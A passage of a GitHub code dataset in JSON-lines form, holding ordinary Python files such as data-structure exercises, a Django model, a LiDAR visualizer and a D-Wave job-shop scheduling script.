optimizer.step()","repo_name":"guessuppp/-Pytorchtrains-","sub_path":"加载数据及2.py","file_name":"加载数据及2.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"4579612334","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\nclass Queue:\n def __init__(self):\n self.front=None\n self.rear=None\n\n def enqueue(self):\n n=input(\"Enter the element you want to insert in queue\")\n new=Node(n)\n if self.front is None:\n self.front=new\n self.rear=new\n else:\n self.rear.next=new\n self.rear=new\n \n def dequeue(self):\n if self.front is None:\n print(\"Queue is empty\")\n elif self.front.next is None:\n print(\"Popped element is: \",self.front.data)\n self.front=None\n else:\n temp=self.front\n print(\"Popped element is: \",self.front.data)\n self.front=temp.next\n temp=None\n\n\n def display(self):\n if self.front is None:\n print(\"Queue is empty\")\n else:\n print(\"Displaying the elements of the queue\")\n temp=self.front\n while temp:\n print(temp.data,\"-->\",end=\" \")\n temp=temp.next\n\n print(\"\\nFront of the queue is: \",self.front.data)\n print(\"\\nRear of the queue is: \",self.rear.data)\n\n\n\n\nq=Queue()\nwhile(1):\n print(\"\\n Enter the option: \\n 1-Enqueue Operation \\n 2-Dequeue Operation \\n 3-Display \\n 4-Enter any key to break the loop\")\n user_option=int(input())\n if user_option==1:\n print(\"Enqueue operation\")\n q.enqueue()\n elif user_option==2:\n print(\"Dequeue Operation\")\n q.dequeue()\n elif user_option==3:\n print(\"Display Operation\")\n q.display()\n else:\n print(\"EXIT From the loop\")\n break","repo_name":"pritha06/sde-bootcamp","sub_path":"stack and queue/queue_basic_operations_using_linked_list.py","file_name":"queue_basic_operations_using_linked_list.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"24588607133","text":"# A binary tree node \nclass Node: \n\n\t# Constructor to create a new node \n\tdef __init__(self, data): \n\t\tself.data = data \n\t\tself.left = None\n\t\tself.right = None\n\n\n# Recursive 
function to print the right view of a binary tree \ndef rightViewUtil(root, level, max_level): \n\t\n\t# Base Case \n\tif root is None: \n\t\treturn\n\n\tif (max_level[0] < level): \n\t\tprint(\"% d\\t\" %(root.data))\n\t\tmax_level[0] = level \n\n\trightViewUtil(root.right, level + 1, max_level) \n\trightViewUtil(root.left, level + 1, max_level)\n\ndef rightView(root): \n\tmax_level = [0] \n\trightViewUtil(root, 1, max_level) \n \nroot = Node(12) \nroot.left = Node(10) \nroot.right = Node(20) \nroot.right.left = Node(25) \nroot.right.right = Node(40) \n\nrightView(root) ","repo_name":"annshiv/100day-coding-challenge","sub_path":"day 19/bin_right.py","file_name":"bin_right.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
{"seq_id":"24837639262","text":"import numpy as np\nimport pyHilbertCpp as hilbert \nfrom ParticleContainer import ParticleContainer, testfun_verify_verlet_list\nfrom fcc import FCC\nimport math\n\n\"\"\"\n3374 255 1 2 4\n3375 255 1 2 4\n3376 255 2 2 3\n3377 255 2 2 3\n3378 255 2 2 4\n3379 255 2 2 4\n3380 255 2 2 3\n3381 255 2 2 3\n3382 255 2 2 4\n\"\"\"\nprint(hilbert.ijk2h_1(1,2,4))\nprint(hilbert.ijk2h_1(2,2,3))\nexit()\nnB = 10\nn_atoms = 4*nB**3\natoms = ParticleContainer(n_atoms,arrays='raih')\n\nrmin = math.pow(2,1/6)\na = math.sqrt(2)*rmin\noffset = np.ones((3,))*(0.25*a)\natoms.rx,atoms.ry,atoms.rz,nb = FCC(n_atoms,a=a,offset=offset,verbose=False)\nassert nb==nB\n\nrcutoff = 3*rmin\natoms.compute_ijk_h(cell_width=rcutoff)\natoms.build_tables(rcutoff=rcutoff,reserve_atoms_per_cell=80,reserve_verlet=200,verbose=True)\n\nfor i in range(n_atoms):\n print(i,atoms.h[i],atoms.i[i],atoms.j[i],atoms.k[i])\n\nH = atoms.hilbert_list.shape\nfor i in range(H[1]):\n print(i, atoms.hilbert_list[0,i], atoms.hilbert_list[1,i])","repo_name":"etijskens/hpc-tnt-1.2","sub_path":"pyMD/testje.py","file_name":"testje.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73373436214","text":"# coding=utf-8\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom mpl_toolkits.mplot3d import Axes3D # import the Axes3D class\r\n\r\nfig = plt.figure() # get the current figure object\r\nfig.set_size_inches(10, 5) # set the figure size, in inches\r\nax = fig.gca(projection='3d') # get the figure's current axes (created if they do not exist or have the wrong projection); the returned type is a subclass of Axes3D\r\n\r\nx = np.linspace(-10, 10, 1000) # create arrays with the given range and element count; here both the x and y ranges are [-10, 10]\r\ny = np.linspace(-10, 10, 1000) # every point is determined by its [x, y, z] coordinates, so the three arrays must have the same number of elements\r\nz = np.add(x, y) # np.add is an element-wise operation: it adds the elements of x and y one by one, and the result is still an array of 1000 elements\r\n\r\nax.plot(x, y, z) # draw the 3D line plot\r\nplt.show()\r\n\r\n# ### 3D plotting\r\n# Matplotlib can draw 3D figures;\r\n# - Tutorials:https://matplotlib.org/tutorials/toolkits/mplot3d.html\r\n# - Examples:https://matplotlib.org/gallery/index.html#d-plotting\r\n# - API:https://matplotlib.org/api/toolkits/mplot3d.html\r\n#\r\n# ### Axes3D\r\n# API:https://matplotlib.org/api/_as_gen/mpl_toolkits.mplot3d.axes3d.Axes3D.html\r\n# all of the 3D plotting functions discussed here live on this interface;\r\n# some commonly used functions:\r\n# - plot(): draw a 3D line plot\r\n# - scatter(): draw a 3D scatter plot\r\n# - plot_wireframe(): draw a 3D wireframe\r\n# - plot_surface(): draw a 3D surface\r\n# - contour(): draw 3D contour lines\r\n# - bar(): draw a 3D bar chart\r\n# - 
add_collection3d(): add 3D collection objects to the figure, useful for drawing 3D polygons\r\n","repo_name":"anliven/Hello-Data","sub_path":"Matplotlib/Matplotlib07_3D_plot.py","file_name":"Matplotlib07_3D_plot.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38113615095","text":"import random\r\n\r\nN = 3\r\nGAME = ['•', '•', '•', '•', '•', '•', '•', '•', '•']\r\n\r\n\r\ndef print_pole():\r\n for i in range(N):\r\n print(GAME[3 * i], GAME[3 * i + 1], GAME[3 * i + 2])\r\n\r\n\r\ndef game_continues():\r\n for i in range(N):\r\n if GAME[i] == GAME[i + 3] == GAME[i + 6] == 'X':\r\n print(\"Crosses won\")\r\n return False\r\n if GAME[i] == GAME[i + 3] == GAME[i + 6] == '0':\r\n print(\"Noughts won\")\r\n return False\r\n for i in (0, 3, 6):\r\n if GAME[i] == GAME[i + 1] == GAME[i + 2] == 'X':\r\n print(\"Crosses won\")\r\n return False\r\n if GAME[i] == GAME[i + 1] == GAME[i + 2] == '0':\r\n print(\"Noughts won\")\r\n return False\r\n if GAME[0] == GAME[4] == GAME[8] == 'X':\r\n print(\"Crosses won\")\r\n return False\r\n if GAME[0] == GAME[4] == GAME[8] == '0':\r\n print(\"Noughts won\")\r\n return False\r\n if GAME[2] == GAME[4] == GAME[6] == 'X':\r\n print(\"Crosses won\")\r\n return False\r\n if GAME[2] == GAME[4] == GAME[6] == '0':\r\n print(\"Noughts won\")\r\n return False\r\n\r\n dots = 0\r\n for i in range(9):\r\n if GAME[i] == '•': dots += 1\r\n if dots > 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef go_player():\r\n if game_continues():\r\n input_cycle = True\r\n\r\n while input_cycle:\r\n x, y = input(\"Enter the coordinates: \").split()\r\n if not x.isdigit() or not y.isdigit():\r\n print(\"Invalid coordinates\")\r\n continue\r\n else:\r\n x = int(x) - 1\r\n y = int(y) - 1\r\n if x > 2 or y > 2 or x < 0 or y < 0 or GAME[x * N + y] != '•':\r\n print(\"Invalid coordinates\")\r\n else:\r\n input_cycle = False\r\n return x, y\r\n\r\n\r\ndef go_computer():\r\n rng = random.Random()\r\n comp_cycle = True\r\n while comp_cycle:\r\n x = rng.randrange(N)\r\n y = rng.randrange(N)\r\n if GAME[x * N + y] == '•':\r\n comp_cycle = False\r\n return x, y\r\n\r\n\r\ndef game_process():\r\n print_pole()\r\n while game_continues():\r\n x, y = go_player()\r\n GAME[x * N + y] = 'X'\r\n if game_continues():\r\n x, y = go_computer()\r\n GAME[x * N + y] = '0'\r\n print_pole()\r\n\r\n\r\ngame_process()\r\n\r\n","repo_name":"AOvsyannikov1/My_progs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5631440076","text":"import sys\nsys.stdin = open('input.txt')\n\n\ndef in_order(v):\n if v <= N:\n in_order(v*2)\n print(alp_lst[v], end='')\n in_order(v*2+1)\n\nT = 10\nfor tc in range(1, T+1):\n N = int(input())\n alp_lst = [0] * (N+1)\n for i in range(N):\n li = list(input().split())\n alp_lst[i+1] = li[1]\n print(f'#{tc}', end=' ')\n in_order(1)\n print()\n\n","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/SWEA/1231_중위순회/1231_중위순회.py","file_name":"1231_중위순회.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"24118050725","text":"from django.core.validators import MinLengthValidator\nfrom django.db import models\n\nfrom petstagram.basic.model_mixins import StrFromFieldsMixin\nfrom petstagram.basic.validators import validate_image_less_than_5mgb\nfrom 
petstagram.pets.models import Pet\n\n\n# Create your models here.\n\n\nclass Photo(StrFromFieldsMixin, models.Model):\n str_fields = ('photo', 'location')\n\n MEDIA_FILES = 'mediafiles/pet_photo/'\n MIN_DESCRIPTION_LENGTH = 10\n MAX_DESCRIPTION_LENGTH = 300\n\n MAX_LOCATION_LENGTH = 30\n\n # Requires mediafiles to work correctly\n photo = models.ImageField(\n upload_to=MEDIA_FILES,\n validators=(validate_image_less_than_5mgb,),\n null=False,\n blank=True,\n )\n\n description = models.CharField(\n max_length=MAX_DESCRIPTION_LENGTH,\n validators=(\n # Django/python validation not DV Validation\n MinLengthValidator(MIN_DESCRIPTION_LENGTH),\n ),\n null=True,\n blank=True,\n )\n\n location = models.CharField(\n max_length=MAX_LOCATION_LENGTH,\n null=True,\n blank=True,\n )\n\n publication_date = models.DateField(\n auto_now=True,\n null=False,\n blank=True,\n )\n\n tagged_pets = models.ManyToManyField(\n Pet,\n blank=True,\n )\n","repo_name":"Orminis/petstagram","sub_path":"petstagram/photos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18239015461","text":"n, m = map(int, input().split())\na = list(map(int, input().split()))\n\n\ndef check(a, mid):\n l = len(a)\n t1 = a[0]\n t2 = a[0]\n ans = 1\n for i in range(1, l):\n if t1 > a[i]:\n t1 = a[i]\n # keep track of the minimum\n if t2 < a[i]:\n t2 = a[i]\n # keep track of the maximum\n if t2-t1 > mid:\n ans += 1\n t1 = a[i]\n t2 = a[i]\n return ans\n\n\nleft = 0\nright = max(a)\nans = right\nwhile left <= right:\n mid = (left + right) // 2\n if check(a, mid) <= m:\n if ans > mid:\n ans = mid\n right = mid - 1\n\n else:\n left = mid + 1\n\nprint(ans)\n\n","repo_name":"yeonnseok/ps-algorithm","sub_path":"2019 baekjoon/BinarySearch/13397_divide2.py","file_name":"13397_divide2.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"3315785856","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 31 09:04:56 2018\n\n@author: ivan\n\nVisualizer for the Lidar's data. It can be used with both Hokuyo and the rpLidar. It contains the core/bare minimum functions to get the data,\ntransform it, calculate necessary angles and orientations, correct the data and display it.\n\nTo be fully working the script needs both a lidar and an IMU/Arduino combo, but with small changes \n\"\"\"\n\n# Default imports\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport serial\n\n\n# LiDAR driver/library import - UTM-30LX lidar and rpLiDAR \nimport UTM_30LX as lx\n\nfrom rplidar import RPLidar\nfrom rplidar import RPLidarException\n\n# Imports from the helper library - lite version that contains only the necessary minimum. They are explained in the library itself\nfrom helperFunctions_lite import calculateMeans, circle2cart_drone, circle2cart_points, calculateAnglesPCA, testEllipse, calculateMinMax, intersectionLineCurve,getDataFromIMU\n\n#Class for animating the visualization\nclass AnimatedScatter(object):\n \"\"\"An animated scatter plot using matplotlib.animations.FuncAnimation. 
WhichLidar -> 0 = rplidar, 1 = NONE, 2 = hokuyo\n MaxRange, AxisRange - ranges only for visualization\n lidarMinThresh, lidarMaxThresh - distance thresholds for what data is taken from the lidar reading\n whichCenter - only for demonstration purposes - if 0 then lidar is center of coordinate system, if 1 then the lidar's position is calculated from all its readings to an arbitrary 0-based coordinate system\n \"\"\"\n \n def __init__(self,portName = '/dev/ttyACM0', maxRange = 30000, axisRange = 10000, whichLidar = 2, lidarMinThresh = 500, lidarMaxThresh = 5000, whichCenter = 0):\n \n #===============================================================#\n #=================== Initialization Block ======================#\n #===============================================================#\n \n self.maxRange = maxRange\n self.axisRange = axisRange\n \n self.whichLidar = whichLidar\n self.portName = portName\n \n self.lidarMinThresh = lidarMinThresh\n self.lidarMaxThresh = lidarMaxThresh\n \n self.whichCenter = whichCenter\n \n # global variables \n self.anglePCA = 0 # angle of the blade points, calculated using PCA\n self.PCACalculated = False # helper bool for determining if blade angle calculated\n \n self.environmentPoints = [] # detected points from blade\n\n self.calculateEllipse = False # is the ellipse calculated\n \n self.ellipseAlgStart = False # is the elliptical algorithm running\n\n \n self.serial_IMU = serial.Serial(\"COM10\",57600) # IMU + arduino serial, if no IMU is present please comment out\n \n self.arduinoInitial = np.zeros(8)#if no IMU is present please comment out\n self.lidarRotAngle = 0 # lidar rotation angle , if no IMU is present please comment out\n \n self.armedAngle = 0 # lidar angle when the blade angle is calculated, used as an initial angle, if no IMU is present please comment out\n \n # initialize lidar - in case of the rpLidar an initial health check is required to be sure that the proper data is sent \n if self.whichLidar == 0:\n \n self.lidar = RPLidar(self.portName)\n \n print(\"Starting Lidar...\")\n ## Start Lidar and gets info\n while True:\n try:\n \n info = self.lidar.get_health()\n \n \n break\n except RPLidarException:\n \n print(\"Lidar error retry\")\n finally:\n self.lidar.stop()\n \n print(info)\n \n self.iterator = self.lidar.iter_scans(1000,5,100,6000)\n \n elif self.whichLidar == 1:\n pass\n # The sweep lidar is removed as it is not currently used \n \n \n elif self.whichLidar == 2:\n\n self.lidar = lx.connect(self.portName) \n \n lx.startLaser(self.lidar)\n\n #===============================================================#\n #========================== BLOCK END ==========================#\n #===============================================================#\n \n \n #===============================================================#\n #================== Setup figures and events ===================#\n #===============================================================#\n \n # Setup the figure and axes...\n self.fig, self.ax = plt.subplots()\n \n self.fig.canvas.mpl_connect('close_event', self.handle_close) # event for clicking the X\n \n self.onClickEv = self.fig.canvas.mpl_connect('button_press_event', self.on_click) # event for clicking the mouse button\n # Then setup FuncAnimation. 
 self.update is the update function, while self.setup_plot initializes the figures\n        self.ani = animation.FuncAnimation(self.fig, self.update, interval=1./40, \n                                          init_func=self.setup_plot, blit=True)\n        \n        \n        #===============================================================#\n        #========================== BLOCK END ==========================#\n        #===============================================================#\n\n\n    # Handler function for closing the figure, each lidar has a different exit strategy \n    def handle_close(self,evt):\n        print('Closed Figure!')\n        \n        self.fig.canvas.mpl_disconnect(self.onClickEv) \n        self.serial_IMU.close() # disconnect IMU serial, if no IMU is present please comment out\n        if self.whichLidar == 0:\n            \n            self.lidar.stop()\n            self.lidar.stop_motor()\n            self.lidar.disconnect()\n        elif self.whichLidar == 1:\n            pass\n        \n        elif self.whichLidar == 2:\n            self.lidar.close()\n        \n    # Handler function for a mouse click on the canvas \n    def on_click(self, evt):\n        \n        # if the blade points' orientation is calculated and the elliptical alg is not started - start it now \n        if self.PCACalculated and not self.ellipseAlgStart:\n            self.ellipseAlgStart = True\n        \n        # if the blade points' orientation is not calculated - do it \n        if not self.PCACalculated:\n            \n            self.anglePCA = calculateAnglesPCA(self.environmentPoints)\n            self.PCACalculated = True\n            \n            print(self.anglePCA)\n        \n        \n        print(\"Clicked\")\n        \n    # Setup function for plotting \n    def setup_plot(self):\n\n        \"\"\"Setup static markings.\"\"\"\n\n        # Setup axis limits\n        self.ax.axis([-self.axisRange, self.axisRange, -self.axisRange, self.axisRange])\n\n        # Create updating scatter plots and variables for later use\n        self.scat = self.ax.scatter([], [], c='b', s=1, animated=True, alpha=0.5)\n        \n        self.scat_lidar = self.ax.scatter([], [], c='r', s=30, animated=True, alpha=0.5)\n        \n        self.scat_ellipse = self.ax.scatter([], [], c='g', s=20, animated=True, alpha=0.5)\n\n        # For FuncAnimation's sake, we need to return the artists we'll be using\n        # Note that it expects a sequence of artists, thus the trailing comma.\n        return self.scat,self.scat_lidar,self.scat_ellipse,\n\n    def update(self, i):\n        \"\"\"Update the scatter plot.\"\"\"\n        \n        # The update function runs and gets data from the lidar \n        if self.whichLidar == 0:\n            scan = next(self.iterator)\n            angleDistance = np.array(scan) \n            \n        elif self.whichLidar == 1:\n            pass\n        \n        elif self.whichLidar == 2:\n            # 0 and 1080 are the steps the Hokuyo reads between - 0 to 180 degrees, as it checks in 6 increments per degree\n            # the last value signifies if the data will be clustered - if it's 1 the data is not averaged by captures \n            angleDistance, status = lx.getLatestScanSteps(self.lidar, 0, 1080,1)\n        \n        # Remove data that is farther or closer than the thresholds \n        angleDistance = angleDistance[np.logical_and(angleDistance[:,1] > self.lidarMinThresh, angleDistance[:,1] < self.lidarMaxThresh)]\n        \n        # Used only for testing/visualization purposes - when 0 only the environment points are printed and the lidar is always at 0,0 \n        if self.whichCenter == 0:\n            \n            environmentPoints = circle2cart_points([0,0],angleDistance, 0)\n            lidarPoint = [0,0]\n        # Start the real algorithm \n        elif self.whichCenter == 1:\n            \n            # Get orientation data from the IMU, if no IMU is present comment out the next three lines \n            arduinoOutput = getDataFromIMU(self.serial_IMU,self.arduinoInitial)\n            self.arduinoInitial = arduinoOutput\n            self.lidarRotAngle = arduinoOutput[4]\n\n            # if the elliptical algorithm is started, compensate for the lidar's rotation
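\n            # (added note) the circle2cart_* helpers are assumed to do the usual\n            # polar -> Cartesian conversion, roughly x = cx + d*cos(a) and\n            # y = cy + d*sin(a); shifting every beam angle by the yaw accumulated\n            # since arming keeps the point cloud aligned with the 'armed' frame.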
\n            if self.ellipseAlgStart:\n\n                compensateYaw = self.lidarRotAngle - self.armedAngle # current rotation angle minus the armed angle\n                \n                angleDistance[:,0] = angleDistance[:,0] + compensateYaw \n            \n            # Calculate the mean angle and mean distance \n            meanAngle,meanDist = calculateMeans(angleDistance)\n            \n            # go from polar to the Cartesian system - position the lidar in a 0,0 coordinate system, then reproject the blade points from the lidar's position \n            lidarPoint = circle2cart_drone([0,0],meanAngle, meanDist)\n            environmentPoints = circle2cart_points(lidarPoint,angleDistance, 0)\n        \n        self.environmentPoints = environmentPoints\n        \n        # is the blade orientation calculated\n        if self.PCACalculated:\n            \n            \n            if not self.calculateEllipse:\n                # Calculate the ellipse - first get the major diameter of the ellipse\n                minDist,maxDist,minDist_points,maxDist_points = calculateMinMax(self.environmentPoints)\n                \n                # create the ellipse using the major diameter, major diameter/6 as the minor diameter, the angle of rotation and a 0,0 center\n                ellipseRadAngle, self.ellipseBladePoints = testEllipse(int(maxDist/6), int(maxDist), self.anglePCA, [0,0])\n                self.calculateEllipse = True\n                \n                # save the armed angle of the lidar orientation\n                self.armedAngle = self.lidarRotAngle\n            \n            if self.ellipseAlgStart:\n                \n                # get the average detected point position\n                averagePointPos=[sum(environmentPoints[:,0])/len(environmentPoints[:,0]),sum(environmentPoints[:,1])/len(environmentPoints[:,1])]\n                pCenter=np.array((0,0))\n                pAvg = np.array((averagePointPos[0],averagePointPos[1]))\n                # calculate the distance between the ellipse center and the point\n                distAveragePointToZero = np.linalg.norm(pCenter-pAvg)\n                \n                # find the intersection between the ellipse, the center of the ellipse and the lidar position\n                intersectPointOnCurve = intersectionLineCurve([0,0], lidarPoint, self.ellipseBladePoints)\n                \n                # calculate the correction distance - ellipse radius \n                correctionDist = math.sqrt(intersectPointOnCurve[0]**2 + intersectPointOnCurve[1]**2)\n                # calculate the new center for going from polar to Cartesian using the correction distance and the distance of the average point to zero\n                newCenterPos = circle2cart_drone([0,0],meanAngle, correctionDist -distAveragePointToZero)\n                \n                lidarPoint = circle2cart_drone(newCenterPos,meanAngle, meanDist)\n                \n                environmentPoints = circle2cart_points(lidarPoint,angleDistance, 0)\n                # visualize the ellipse\n                self.scat_ellipse.set_offsets(self.ellipseBladePoints)\n\n\n        # Visualize the environment and lidar points \n        self.scat.set_offsets(environmentPoints)\n        \n        self.scat_lidar.set_offsets(lidarPoint)\n\n        # We need to return the updated artists for FuncAnimation to draw.\n        # Note that it expects a sequence of artists, thus the trailing comma.\n        return self.scat,self.scat_lidar,self.scat_ellipse,\n\n    def show(self):\n        plt.show()\n        \n\n\n\nif __name__ == '__main__':\n\n    \n    a = AnimatedScatter(\"COM9\",1000,1000,2, 100, 300, 1)\n    a.show()","repo_name":"IvanNik17/Testing-and-Visualizing-rpLiDAR-and-Hokuyo-UTM-30LX","sub_path":"LiDAR_animate.py","file_name":"LiDAR_animate.py","file_ext":"py","file_size_in_byte":13206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4746397713","text":"#!/usr/bin/python3\n\"\"\"\ndefines all common attributes/methods for other classes\n\"\"\"\n\nfrom datetime import datetime\nimport uuid\nimport models\nimport sqlalchemy\nfrom sqlalchemy import Column, String, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base
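\n\n# (added note) models.storage_t is expected to be set by the models package,\n# commonly from the HBNB_TYPE_STORAGE environment variable; 'db' selects the\n# SQLAlchemy mappings below, anything else plain objects plus file storage.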
\n\ntime = \"%Y-%m-%dT%H:%M:%S.%f\"\n\nif models.storage_t == \"db\":\n    Base = declarative_base()\nelse:\n    Base = object\n\n\nclass BaseModel:\n    \"\"\"Base for all AirBnB website projects\"\"\"\n\n    if models.storage_t == \"db\":\n        id = Column(String(60), primary_key=True)\n        created_at = Column(DateTime, default=datetime.utcnow)\n        updated_at = Column(DateTime, default=datetime.utcnow)\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"initializes the basemodel class\"\"\"\n        if not kwargs:\n            self.id = str(uuid.uuid4())\n            self.created_at = datetime.utcnow()\n            self.updated_at = self.created_at\n            models.storage.new(self)\n        elif kwargs:\n            for key, value in kwargs.items():\n                if key != '__class__':\n                    setattr(self, key, value)\n            if kwargs.get(\"created_at\", None) and type(self.created_at) is str:\n                self.created_at = datetime.strptime(kwargs[\"created_at\"], time)\n            else:\n                self.created_at = datetime.utcnow()\n            if kwargs.get(\"updated_at\", None) and type(self.updated_at) is str:\n                self.updated_at = datetime.strptime(kwargs[\"updated_at\"], time)\n            else:\n                self.updated_at = datetime.utcnow()\n            if kwargs.get(\"id\", None) is None:\n                self.id = str(uuid.uuid4())\n\n    def __str__(self):\n        \"\"\"returns a string representation of this class\"\"\"\n        name = self.__class__.__name__\n        return \"[{}] ({}) {}\".format(name, self.id, self.__dict__)\n\n    def save(self):\n        \"\"\"updates updated_at with the current datetime\"\"\"\n        self.updated_at = datetime.utcnow()\n        models.storage.new(self)\n        models.storage.save()\n\n    def to_dict(self):\n        \"\"\"returns the dictionary containing all keys of __dict__\"\"\"\n        new_dict = self.__dict__.copy()\n        if \"created_at\" in new_dict:\n            new_dict[\"created_at\"] = new_dict[\"created_at\"].strftime(time)\n        if \"updated_at\" in new_dict:\n            new_dict[\"updated_at\"] = new_dict[\"updated_at\"].strftime(time)\n        new_dict[\"__class__\"] = self.__class__.__name__\n        if \"_sa_instance_state\" in new_dict:\n            del new_dict[\"_sa_instance_state\"]\n        return new_dict\n\n    def delete(self):\n        \"\"\"delete the current instance from the storage\"\"\"\n        models.storage.delete(self)\n","repo_name":"sebagadisk/AirBnB_clone_v2","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35865778379","text":"import sys\n\ninput = sys.stdin.readline\n# number of numbers, number of players, gift position, number of rounds\nn, k, p, l = map(int, input().split())\narr = [list(map(int, input().split())) for _ in range(k)]\n\nplayer, rnd = -1, 1\ncur = 1\nis_winner = False\nfor i in range(l): # l rounds\n    for j in range(k): # k players\n        turn = arr[j][i]\n        # rotate\n        for _ in range(turn):\n            if cur == 1:\n                cur = n\n            else:\n                cur -= 1\n        if cur == p:\n            print(j+1, i+1)\n            sys.exit()\n\nprint(-1)\n","repo_name":"combiJihoon/AlgorithmStudy","sub_path":"elice/test3-2.py","file_name":"test3-2.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71048485174","text":"import dwave\nimport dwavebinarycsp\nfrom dwave.embedding import embed_qubo\n\nfrom dwave.system import DWaveSampler\nfrom dwave_networkx import chimera_graph\n\nfrom utils.jobshop_helpers import ones_from_sample\nfrom utils.jobshopproblem import JobShopProblem, pruned_number\n\njob_shop_problem = JobShopProblem.from_data([[2, 1], [1,2]], 2,
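\n    # (added note; an assumption, not documented in this snippet: the nested\n    # list appears to give each job's machine sequence, 2 the machine count\n    # and 4 the time horizon)\n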
4)\n\njob_shop_problem.add_starts_once_constraint()\njob_shop_problem.add_one_job_one_machine_constraint()\njob_shop_problem.add_operations_order_constraint()\n\n\nprint(job_shop_problem.qubo)\nprint(job_shop_problem.qubo_pruned)\n# Q, offset = dwavebinarycsp.stitch(job_shop_problem.csp, max_graph_size=16, min_classical_gap=0.6).to_qubo()\n#\n# response = QBSolv().sample_qubo(job_shop_problem.qubo_pruned, solver=sampler, solver_limit=30)\n\nlinear = {}\nquadratic = {}\nqubits_number = pruned_number\nfor i in range(qubits_number):\n linear['x{}'.format(i), 'x{}'.format(i)] = int(job_shop_problem.qubo_pruned[i, i])\nfor i in range(qubits_number):\n for j in range(i + 1, qubits_number):\n val = job_shop_problem.qubo_pruned[i, j]\n if (val != 0):\n quadratic['x{}'.format(i), 'x{}'.format(j)] = int(val)\n\nQ = dict(linear)\nQ.update(quadratic)\n\nprint(Q)\n\nembedding = {}\n\nemb_numbers = []\n# print(job_shop_problem.row_length)\ncells_number = int(qubits_number/4)\nfor i in range(cells_number):\n tmp = []\n # row\n for j in range(1,i + 1 + 1,1):\n tmp.append(i * 128 + 4 * (2 * j - 1))\n for j in range(i,cells_number):\n tmp.append(j * 128 + i * 8)\n emb_numbers.append(tmp)\n\n# for i,num in enumerate(emb_numbers):\n# print(\"i={}, numbers: {}\".format(i,num))\n\nfor num, arr in enumerate(emb_numbers):\n for i in range(4):\n tmp_embedding = set()\n for elem in sorted(arr):\n tmp_embedding.add(elem + i + 16)\n\n # tmp_embedding.add(elem + i)\n # print(\"Num: {}, arr: {}, i: {}, embedding: {}\".format(num, sorted(arr), i, sorted(tmp_embedding)))\n\n embedding['x{}'.format(4 * num + i)] = tmp_embedding\n # print(\"x{}: {}\".format(4 * num + i, sorted(tmp_embedding)))\n\n# embedding = {'x0': {0,4}, 'x1': {1,5}, 'x2': {2,6}, 'x3': {3,7}}\n\n\n# response = EmbeddingComposite(DWaveSampler()).sample_qubo(Q, num_reads=1000)\n#\n\ntQ = dwave.embedding.embed_qubo(Q, embedding, chimera_graph(16), chain_strength=7.8)\n\nresponse = DWaveSampler().sample_qubo(tQ, num_reads=200)\n\nfor s in list(response.data()):\n print(ones_from_sample(s.sample), \"Energy: \", s.energy, \"Occurrences: \", s.num_occurrences)\n#\n#\n\nprint(\"UNEMBEDED RESULTS\")\nsource_bqm = dwavebinarycsp.dimod.BinaryQuadraticModel.from_qubo(Q)# (linear, quadratic, 0, Vartype.BINARY)\nsuma = 0\nfor i, val in enumerate(dwave.embedding.unembed_sampleset(response, source_bqm=source_bqm, embedding=embedding)):\n suma += list(response.data())[i].num_occurrences\n print(ones_from_sample(val), list(response.data())[i].num_occurrences, list(response.data())[i].energy, suma)\n","repo_name":"dawtom/quantum_optimization","sub_path":"working/small_JS_pruned_handEmbedded.py","file_name":"small_JS_pruned_handEmbedded.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10380747965","text":"import xml.etree.ElementTree as ET \r\nimport xlsxwriter\r\nimport os.path\r\nimport openpyxl\r\npath = 'C:\\\\users\\\\robi\\\\desktop\\\\dir\\\\rest\\\\SoapUIResults'\r\nnum_files = len([f for f in os.listdir(path)if os.path.isfile(os.path.join(path, f))])\r\nnum=num_files/2\r\nwb = openpyxl.load_workbook(\"C:\\\\users\\\\robi\\\\desktop\\\\new1.xlsx\") \r\nsheet = wb['ACTUAL'] \r\n#clm = sheet.max_column\r\nrwnm = len([row for row in sheet if not all([cell.value == None for cell in row])]) + 1\r\n#clm = len([column for column in sheet if not all([cell.value == None for cell in column])]) + 2\r\n#print(clm)\r\na=0\r\ni=1\r\nfor j in range(1,int(num+1)):\r\n dom = 
